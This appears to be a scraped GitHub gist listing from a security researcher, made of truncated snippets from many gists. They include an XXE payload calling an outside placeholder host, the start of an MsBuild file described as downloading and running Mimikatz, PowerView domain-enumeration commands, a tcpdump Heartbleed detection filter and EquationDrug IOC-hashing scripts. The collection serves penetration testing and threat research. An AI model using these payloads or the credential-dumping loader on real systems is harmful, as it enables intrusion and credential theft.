@schrodyn
schrodyn / XXE_payloads
Created August 30, 2016 15:52 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@schrodyn
schrodyn / scrdec18-VC8.exe
Created September 13, 2016 17:19 — forked from bcse/scrdec18-VC8.exe
Windows Script Decoder 1.8 (Decoding JScript.Encoded)
@schrodyn
schrodyn / katz.xml
Created October 9, 2016 23:12
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@schrodyn
schrodyn / PowerView-2.0-tricks.ps1
Created October 9, 2016 23:35 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
# basic pfctl control
# ==
# Related: http://www.OpenBSD.org
# Last update: Tue Dec 28, 2004
# ==
# Note:
# this document is only provided as a basic overview
# for some common pfctl commands and is by no means
# a replacement for the pfctl and pf manual pages.
@schrodyn
schrodyn / gist:3aec990f926082614a4b51d7d39e5085
Created November 9, 2016 13:27 — forked from crisroura/gist:10473454
Live detection of client heartbleed attack with tcpdump
Slight modification of the tcpdump filter expression included in the heartbleed.py script by Riverbed [1][2] to detect live client-side heartbleed attacks.
Modified the original filter to detect traffic to a specific client host from any port. Also modified the length check to 68. For more information about this tcpdump filter, take a look at the Riverbed blog post [2].
Detection tested with https://reverseheartbleed.com
tcpdump -i <INTERFACE> "((not ether proto 0x8100) and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68)))) or (vlan and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68))))"
Example to detect client heartbleed att
@schrodyn
schrodyn / EquationDrug-IOC-list.txt
Created January 14, 2017 15:45 — forked from msuiche/EquationDrug-IOC-list.txt
List of EquationDrug IOCs #ShadowBrokers
PS E:\ioc> dir . | Foreach-Object{
>> $file = $_
>> $hash = Get-FileHash $file -Algorithm MD5
>> $fileinfo = Get-Item $file
>>
>> New-Object -TypeName PSObject -Property @{
>> LastWriteTime = $fileinfo.LastWriteTime
>> Length = $fileinfo.Length
>> Algorithm = $hash.Algorithm
>> MD5 = $hash.Hash
@schrodyn
schrodyn / ioc-generator.ps1
Created January 14, 2017 15:45 — forked from msuiche/ioc-generator.ps1
PowerShell IOCs generator
# Hash every file in the current directory and emit one object per file
# (closing lines restored from the session shown in the previous gist).
dir . | Foreach-Object{
$file = $_
$hash = Get-FileHash $file -Algorithm MD5
$fileinfo = Get-Item $file
New-Object -TypeName PSObject -Property @{
VersionInfo = $fileinfo.VersionInfo
LastWriteTime = $fileinfo.LastWriteTime
Length = $fileinfo.Length
Algorithm = $hash.Algorithm
MD5 = $hash.Hash
}
}
@schrodyn
schrodyn / equation_drug_hashes.txt
Created January 14, 2017 15:47 — forked from msuiche/equation_drug_hashes.txt
file list equationdrug
@schrodyn
schrodyn / file.rsp
Created January 17, 2017 16:43 — forked from NickTyrer/file.rsp
REGSVR odbcconf.dll